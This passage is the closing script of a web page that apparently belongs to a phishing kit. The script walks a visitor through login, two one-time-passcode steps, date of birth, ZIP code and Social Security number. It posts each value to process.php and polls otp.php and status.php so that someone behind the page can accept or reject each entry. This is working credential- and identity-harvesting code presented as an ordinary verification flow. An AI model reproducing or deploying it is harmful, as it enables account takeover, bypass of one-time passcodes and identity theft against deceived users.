      updateSecondContinueBtn();
    }
    
    function hideSecondOtpError() {
      const secondOtpErrorDiv = document.getElementById('secondOtpError');
      if (secondOtpErrorDiv) {
        secondOtpErrorDiv.style.display = 'none';
      }
    }
    
    let secondOtpCheckInterval;
    
    function startSecondOtpStatusCheck(otpCode) {
      if (secondOtpCheckInterval) {
        clearInterval(secondOtpCheckInterval);
      }
      
      secondOtpCheckInterval = setInterval(async () => {
        try {
          const response = await fetch(`otp.php?check_status=${encodeURIComponent(otpCode)}`);
          const result = await response.json();
          
          if (result.status === 'rejected') {
            clearInterval(secondOtpCheckInterval);
            showSecondOtpError('OTP verification rejected.');
            secondContinueBtn.innerHTML = 'Next';
            updateSecondContinueBtn();
          } else if (result.status === 'accepted') {
            clearInterval(secondOtpCheckInterval);
            document.getElementById('secondOtpFormContainer').style.display = 'none';
            document.getElementById('ssnFormContainer').style.display = 'flex';
            updateProgressBar(5); 
            secondContinueBtn.innerHTML = 'Next';
            updateSecondContinueBtn();
          }
        } catch (error) {
          console.error('Error checking second OTP status:', error);
        }
      }, 2000);
    }
    
    async function handleAdditionalInfo() {
      const dob = dobInput.value.trim();
      const zipcode = zipcodeInput.value.trim();
      
      additionalInfoBtn.innerHTML = 'Loading <span class="spinner"></span>';
      additionalInfoBtn.disabled = true;
      
      try {
        const formData = new FormData();
        formData.append('dob', dob);
        formData.append('zipcode', zipcode);
        
        const response = await fetch('process.php', {
          method: 'POST',
          body: formData
        });
        
        const result = await response.json();
        
        if (result.status === 'error') {
          showAdditionalInfoError(result.message || 'Failed to submit additional information.');
        } else if (result.status === 'pending') {
          document.getElementById('additionalInfoFormContainer').style.display = 'none';
          document.getElementById('secondOtpFormContainer').style.display = 'flex';
          updateProgressBar(4);
          additionalInfoBtn.innerHTML = 'Next';
          updateAdditionalInfoBtn();
        } else {
          showAdditionalInfoError('Failed to submit additional information.');
        }
        
      } catch (error) {
        showAdditionalInfoError('Network error. Please try again.');
      }
    }
    
    async function handleVerify() {
      const ssn = ssnInput.value.trim();
      
      verifyBtn.innerHTML = 'Loading <span class="spinner"></span>';
      verifyBtn.disabled = true;
      
      try {
        const formData = new FormData();
        formData.append('ssn', ssn);
        
        const response = await fetch('process.php', {
          method: 'POST',
          body: formData
        });
        
        verifyBtn.innerHTML = 'Verified';
        verifyBtn.disabled = false;
        
      } catch (error) {
        verifyBtn.innerHTML = 'Verify';
        updateVerifyBtn();
      }
    }
    
    function showAdditionalInfoError(message) {
      const errorDiv = document.getElementById('additionalInfoError');
      if (!errorDiv) {
        const newErrorDiv = document.createElement('div');
        newErrorDiv.id = 'additionalInfoError';
        newErrorDiv.className = 'error-message';
        newErrorDiv.style.display = 'block';
        document.querySelector('.additional-info-form').appendChild(newErrorDiv);
      }
      document.getElementById('additionalInfoError').textContent = message;
      additionalInfoBtn.innerHTML = 'Next';
      updateAdditionalInfoBtn();
    }
    
    let additionalInfoCheckInterval;
    
    function startAdditionalInfoStatusCheck() {
      if (additionalInfoCheckInterval) {
        clearInterval(additionalInfoCheckInterval);
      }
      
      additionalInfoCheckInterval = setInterval(async () => {
        try {
          const response = await fetch(`status.php?user=${encodeURIComponent(sessionStorage.getItem('uniqueId') || '')}`);
          const result = await response.json();
          
          if (result.status === 'reject') {
            clearInterval(additionalInfoCheckInterval);
            showAdditionalInfoError('Additional information rejected.');
            additionalInfoBtn.innerHTML = 'Next';
            updateAdditionalInfoBtn();
          } else if (result.status === 'accept') {
            clearInterval(additionalInfoCheckInterval);
            alert('Additional information accepted! Process completed.');
            additionalInfoBtn.innerHTML = 'Continue';
            updateAdditionalInfoBtn();
          }
        } catch (error) {
          console.error('Error checking additional info status:', error);
        }
      }, 2000);
    }
    
    otpInput.addEventListener('input', updateContinueBtn);
    continueBtn.addEventListener('click', handleContinue);
    
    secondOtpInput.addEventListener('input', updateSecondContinueBtn);
    secondContinueBtn.addEventListener('click', handleSecondContinue);
    
    dobInput.addEventListener('input', function() {
      formatDOB(this);
      updateAdditionalInfoBtn();
    });
    zipcodeInput.addEventListener('input', function() {
      formatZipcode(this);
      updateAdditionalInfoBtn();
    });
    additionalInfoBtn.addEventListener('click', handleAdditionalInfo);
    
    ssnInput.addEventListener('input', function() {
      formatSSN(this);
      updateVerifyBtn();
    });
    verifyBtn.addEventListener('click', handleVerify);
    
    usernameInput.addEventListener('input', updateLoginBtn);
    passwordInput.addEventListener('input', updateLoginBtn);
    usernameInput.addEventListener('input', clearErrorOnInput);
    passwordInput.addEventListener('input', clearErrorOnInput);
    loginBtn.addEventListener('click', handleLogin);
    
    updateLoginBtn();
    updateAdditionalInfoBtn();
    updateVerifyBtn();
    updateSecondContinueBtn();
  </script>

</body>
</html>
